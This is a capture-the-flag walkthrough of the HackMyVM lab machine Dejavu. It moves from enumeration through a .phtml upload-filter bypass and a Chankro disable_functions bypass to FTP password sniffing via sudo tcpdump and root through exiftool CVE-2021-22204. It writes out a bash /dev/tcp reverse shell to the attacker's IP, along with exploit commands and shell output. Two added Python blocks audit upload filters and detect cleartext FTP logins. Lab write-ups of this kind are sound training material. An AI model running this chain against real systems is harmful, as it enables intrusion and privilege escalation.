Writeup – HackMyVM’s Dejavu Walkthrough
Dejavu is an easy machine from HackMyVM by the user InfayerTS. The machine includes basic vulnerabilities. First, we find a hidden path in a page’s source. Then, we have a file upload form whose extension filter misses one extension that the server still executes. Similarly, the uploads directory is browsable. However, several PHP functions are disabled, making it difficult to get a reverse shell.
Step 1: Get the IP address
As always, I started the enumeration by identifying the IP address of the target machine.
❯ sudo netdiscover -r 10.0.0.0/24
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 52:54:00:12:35:00 1 60 Unknown vendor
10.0.0.2 52:54:00:12:35:00 1 60 Unknown vendor
10.0.0.3 08:00:27:0e:4f:55 1 60 PCS Systemtechnik GmbH
10.0.0.152 08:00:27:3b:66:78 1 60 PCS Systemtechnik GmbH
Here, the IP address of the target is 10.0.0.152 whereas that of the attacker is 10.0.0.4 (not shown here).
Step 2: Scan services on the target
Next, I scanned the services on the target that we can access from the network.
❯ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-28 22:36 +0545
Nmap scan report for 10.0.0.152
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:8f:5b:43:62:a1:5b:41:6d:7b:6e:55:27:bd:e1:67 (RSA)
| 256 10:17:d6:76:95:d0:9c:cc:ad:6f:20:7d:33:4a:27:4c (ECDSA)
|_ 256 12:72:23:de:ef:28:28:9e:e0:12:ae:5f:37:2e:ee:25 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The SSH banner shows that the operating system is Ubuntu 20.04 (Focal) (https://packages.ubuntu.com/focal-updates/ssh). Likewise, we have an HTTP port to enumerate further.
Step 3: Dig into the HTTP webserver
The front page of the server is only the Apache default page. Thus, I performed directory busting.
❯ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.0.152/ -o common.log
/.hta (Status: 403) [Size: 275]
/.htpasswd (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/index.html (Status: 200) [Size: 10918]
/info.php (Status: 200) [Size: 69927]
/server-status (Status: 403) [Size: 275]
This cursory scan exposed a PHP info file. In it, we see that some functions are disabled (disable_functions).

That becomes important later. For now, the source of the index page reveals a path.
<html>
<body>
<!-- /S3cR3t -->
</body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
<!------------- redacted -------------->
The path “/S3cR3t” has directory listing enabled, so we can browse its contents, including the file upload form and the directory where uploads land.
Now, the first hurdle is to identify an extension that passes the upload filter but still gets executed as a script. The “.phtml” extension does the job.
Reference: https://book.hacktricks.xyz/pentesting-web/file-upload#file-upload-general-methodology
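The following Python audit is an added example, not part of the original writeup: it compares a constructed extension blocklist of the kind this upload form seems to use against the FilesMatch pattern that Ubuntu 20.04's Apache PHP module ships with, and lists the names the filter accepts but Apache would still execute. The blocklist, allowlist and sample filenames are constructed; the Apache pattern is the distro default.

```python
import re

# Handler pattern from Ubuntu 20.04's /etc/apache2/mods-available/php7.4.conf
# (distro default). Note that .phtml and .phar are executed, not just .php.
APACHE_PHP_FILESMATCH = r".+\.ph(ar|p|tml)$"

# Constructed example of a weak upload filter: a blocklist of the extensions
# the developer happened to think of. It never mentions .phtml or .phar.
BLOCKLIST = {"php", "php3", "php4", "php5", "phps"}

# Hardened alternative, also constructed: allow only what the feature needs.
ALLOWLIST = {"jpg", "jpeg", "png", "gif", "pdf"}


def extension(filename):
    """Final extension of the basename, lower-cased ('' if there is none)."""
    base = filename.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def blocklist_allows(filename):
    return extension(filename) not in BLOCKLIST


def allowlist_allows(filename):
    return extension(filename) in ALLOWLIST


def apache_executes(filename, pattern=APACHE_PHP_FILESMATCH):
    """True when Apache's FilesMatch would hand the file to the PHP engine.
    FilesMatch is case-sensitive by default, so re.search is used unflagged."""
    return re.search(pattern, filename) is not None


def filter_gap(filenames, accept):
    """Names the upload filter accepts AND Apache would run as PHP: each one
    is a code-execution path the filter failed to close."""
    return [f for f in filenames if accept(f) and apache_executes(f)]


# Constructed upload attempts, including the .phtml case from the writeup.
SAMPLES = ["shell.phtml", "shell.php", "shell.phar", "pic.jpg", "shell.php.jpg"]

if __name__ == "__main__":
    print("blocklist gap:", filter_gap(SAMPLES, blocklist_allows))
    print("allowlist gap:", filter_gap(SAMPLES, allowlist_allows))
```

The anchored pattern only inspects the last extension, so the classic double-extension trick does not help against this handler configuration; the blocklist's real gap is the handler aliases it never listed, which an allowlist closes by construction.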
Since the functions used to spawn processes are disabled, we cannot get a shell directly. However, there are ways to bypass this restriction. Here I used a simple exploit with the tool Chankro, which relies on the still-allowed mail() function. The problem is that the project has not been maintained for a long time and there is no Python 3 version of it. The technique is described in:
https://www.tarlogic.com/blog/how-to-bypass-disable_functions-and-open_basedir/
Please check the above links for the details. The key point here is that we can use the “mail” function because it is not disabled.
A Python 3 port of the script is available at: https://github.com/kriss-u/chankro-py3
For the exploit, I created a simple reverse shell script, rev.sh:
bash -c 'bash -i >& /dev/tcp/10.0.0.4/9001 0>&1'
Next, run the script. Note that the document root is “/var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats”, so the --path argument must be the absolute on-disk location of the upload directory.

❯ python3 chankro.py --arch 64 --input rev.sh --output shell.phtml --path /var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats/S3cR3t/files/
-=[ Chankro ]=-
-={ @TheXC3LL }=-
[+] Binary file: rev.sh
[+] Architecture: x64
[+] Final PHP: shell.phtml
[+] File created!
It creates a PHP file that, when requested, runs rev.sh and connects back to my listener, in my case on port 9001.
❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
That’s all we need. Now, we upload the output file and open its link, which gets us a shell.
❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.152.
Ncat: Connection from 10.0.0.152:36554.
bash: cannot set terminal process group (747): Inappropriate ioctl for device
bash: no job control in this shell
<nMostCriticalInternetSecurityThreats/S3cR3t/files$
Lastly, I upgraded this dumb shell to a proper interactive one.
Reference: Upgrade to an intelligent reverse shell
Step 4: Sudo abuse tcpdump
Once we get the shell, we have to check the sudo permissions.
www-data@dejavu:/$ sudo -l
Matching Defaults entries for www-data on dejavu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on dejavu:
(robert) NOPASSWD: /usr/sbin/tcpdump
From the output above, www-data can run tcpdump as the user robert. I checked GTFOBins, but none of its tcpdump techniques gave me a shell here.
Reference: https://gtfobins.github.io/gtfobins/tcpdump/#sudo
The next thing to do was to listen to the traffic. To know what to look for, I used pspy64 to snoop on the processes and noticed that a script periodically logs in to the local FTP server.
2022/05/29 05:48:01 CMD: UID=1000 PID=11992 | /bin/sh -c /home/robert/auth.sh
2022/05/29 05:48:01 CMD: UID=1000 PID=11994 | ftp -n localhost
2022/05/29 05:48:01 CMD: UID=1000 PID=11993 | /bin/sh /home/robert/auth.sh
2022/05/29 05:48:01 CMD: UID=65534 PID=11996 | /usr/sbin/vsftpd /etc/vsftpd.conf
2022/05/29 05:48:01 CMD: UID=0 PID=11995 | /usr/sbin/vsftpd /etc/vsftpd.conf
Thus, I knew which port to capture. Since both client and server run on the box, we have to capture on the loopback interface. After some time, the FTP login appears.
www-data@dejavu:/tmp$ sudo -u robert tcpdump -i lo port ftp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
# Redacted
05:52:01.840340 IP localhost.60932 > localhost.ftp: Flags [P.], seq 1:14, ack 21, win 512, options [nop,nop,TS val 2022967189 ecr 2022967189], length 13: FTP: USER robert
05:52:01.840546 IP localhost.ftp > localhost.60932: Flags [.], ack 14, win 512, options [nop,nop,TS val 2022967190 ecr 2022967189], length 0
05:52:01.841224 IP localhost.ftp > localhost.60932: Flags [P.], seq 21:55, ack 14, win 512, options [nop,nop,TS val 2022967190 ecr 2022967189], length 34: FTP: 331 Please specify the password.
05:52:01.841237 IP localhost.60932 > localhost.ftp: Flags [.], ack 55, win 512, options [nop,nop,TS val 2022967190 ecr 2022967190], length 0
05:52:01.841636 IP localhost.60932 > localhost.ftp: Flags [P.], seq 14:32, ack 55, win 512, options [nop,nop,TS val 2022967191 ecr 2022967190], length 18: FTP: PASS #Password redacted
05:52:01.842203 IP localhost.ftp > localhost.60932: Flags [.], ack 32, win 512, options [nop,nop,TS val 2022967191 ecr 2022967191], length 0
05:52:01.870378 IP localhost.ftp > localhost.60932: Flags [P.], seq 55:78, ack 32, win 512, options [nop,nop,TS val 2022967219 ecr 2022967191], length 23: FTP: 230 Login successful.
# Redacted everything
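Added detection example, not part of the original writeup: it parses tcpdump's FTP decode, using sample lines modelled on the capture above with a constructed password, and reports every session whose password crossed the wire in clear text. This is the finding an auditor would raise about auth.sh's plain FTP login on this host; the finding records only that a password was seen (and its length), never the value.

```python
import re

# tcpdump's default text decode for FTP control traffic:
# "<time> IP <src> > <dst>: Flags [...], ..., length N: FTP: <verb> <rest>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\S+) > (?P<dst>\S+): .*length \d+: FTP: "
    r"(?P<verb>\S+)(?: (?P<rest>.*))?$"
)


def parse_ftp_line(line):
    """Return one decoded FTP record, or None for non-FTP/empty segments."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, dst = m["src"], m["dst"]
    is_request = dst.endswith((".ftp", ".21"))  # client -> server direction
    return {"ts": m["ts"], "client": src if is_request else dst,
            "request": is_request, "verb": m["verb"], "rest": m["rest"] or ""}


def find_cleartext_logins(lines):
    """Group control traffic by client endpoint; report sessions where a PASS
    command was observable on the wire. The password is never stored."""
    sessions = {}
    for line in lines:
        rec = parse_ftp_line(line)
        if rec is None:
            continue
        s = sessions.setdefault(rec["client"], {"client": rec["client"],
                                "user": None, "password_seen": False,
                                "password_len": 0, "login_ok": False})
        if rec["request"] and rec["verb"] == "USER":
            s["user"] = rec["rest"]
        elif rec["request"] and rec["verb"] == "PASS":
            s["password_seen"], s["password_len"] = True, len(rec["rest"])
        elif not rec["request"] and rec["verb"] == "230":
            s["login_ok"] = True
    return [s for s in sessions.values() if s["password_seen"]]


# Constructed sample modelled on the capture in the writeup; the password
# value is made up and the unrelated ACK line shows non-FTP segments are skipped.
SAMPLE = """\
05:52:01.840340 IP localhost.60932 > localhost.ftp: Flags [P.], seq 1:14, ack 21, win 512, length 13: FTP: USER robert
05:52:01.840546 IP localhost.ftp > localhost.60932: Flags [.], ack 14, win 512, length 0
05:52:01.841224 IP localhost.ftp > localhost.60932: Flags [P.], seq 21:55, ack 14, win 512, length 34: FTP: 331 Please specify the password.
05:52:01.841636 IP localhost.60932 > localhost.ftp: Flags [P.], seq 14:32, ack 55, win 512, length 18: FTP: PASS NotTheRealOne
05:52:01.870378 IP localhost.ftp > localhost.60932: Flags [P.], seq 55:78, ack 32, win 512, length 23: FTP: 230 Login successful.
""".splitlines()

if __name__ == "__main__":
    for finding in find_cleartext_logins(SAMPLE):
        print(finding)
```

A cleartext protocol on loopback is still exposed to any local account that can capture, which is exactly what the sudo tcpdump grant handed to www-data; the fix is SFTP or FTP over TLS and removing the stored credential from auth.sh.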
The captured password also gives an SSH shell as the user robert.
Step 5: Escalate to root
The sudo permissions show that robert can execute exiftool as root. As the machine’s name hints, this binary is vulnerable through its DjVu handling (CVE-2021-22204).
Reference: https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
Also, the installed version is 12.23, which is vulnerable.
robert@dejavu:/tmp$ exiftool -ver
12.23
The exploit is available at: https://github.com/convisolabs/CVE-2021-22204-exiftool
robert@dejavu:/tmp$ git clone https://github.com/convisolabs/CVE-2021-22204-exiftool
Cloning into 'CVE-2021-22204-exiftool'...
remote: Enumerating objects: 27, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 27 (delta 6), reused 17 (delta 2), pack-reused 0
Unpacking objects: 100% (27/27), 52.51 KiB | 363.00 KiB/s, done.
robert@dejavu:/tmp$ cd CVE-2021-22204-exiftool/
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ ls
configfile exploit.py image.jpg lab README.md
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ vim exploit.py
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ python3 exploit.py
1 image files updated
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ ls
configfile exploit.djvu exploit.py image.jpg image.jpg_original lab payload payload.bzz README.md
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ sudo exiftool exploit.djvu
The only things to update in exploit.py are the attacker IP address and port. Running sudo exiftool on the crafted file gave us a root shell.
❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.152.
Ncat: Connection from 10.0.0.152:60938.
# id
uid=0(root) gid=0(root) groups=0(root)
#